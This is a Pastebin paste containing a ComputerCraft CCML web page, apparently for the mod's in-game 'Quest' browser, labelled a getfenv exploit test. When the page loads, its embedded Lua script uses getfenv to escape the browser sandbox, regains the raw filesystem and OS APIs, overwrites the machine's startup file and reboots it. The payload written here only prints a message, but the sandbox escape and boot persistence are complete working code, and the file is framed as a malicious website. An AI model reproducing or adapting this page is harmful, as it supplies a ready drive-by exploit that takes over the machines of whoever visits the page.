Advertisement
minimite

malware2.ccml

Jun 13th, 2015
404
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.74 KB | None | 0 0
  1. <!DOCTYPE ccml>
  2. <!-- Getfenv Exploit Test, by Atenefyr -->
  3. <html>
  4. <head>
  5. <title>Some Malicious Website</title>
  6. <script type="lua">
  7.   if not getfenv then
  8.     --we can't use the exploit, abort script
  9.     return
  10.   end
  11.   --otherwise, download what could be a malicious file
  12.  
  13.   --the important part of the exploit. we can make all APIs their original form with getfenv
  14.   local os = getfenv(read).os
  15.   local fs = getfenv(read).fs
  16.   --download the startup file
  17.   local txt = [[
  18.   print("This file was downloaded via a Quest exploit. Cool?")
  19.   ]]
  20.   local open = fs.open("startup", "w")
  21.   open.write(txt)
  22.   open.close()
  23.   --reboot the machine
  24.   os.reboot()
  25. </script>
  26. </head>
  27. <body>
  28. <p width="20">Some Sample Text</p>
  29. </body>
  30. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement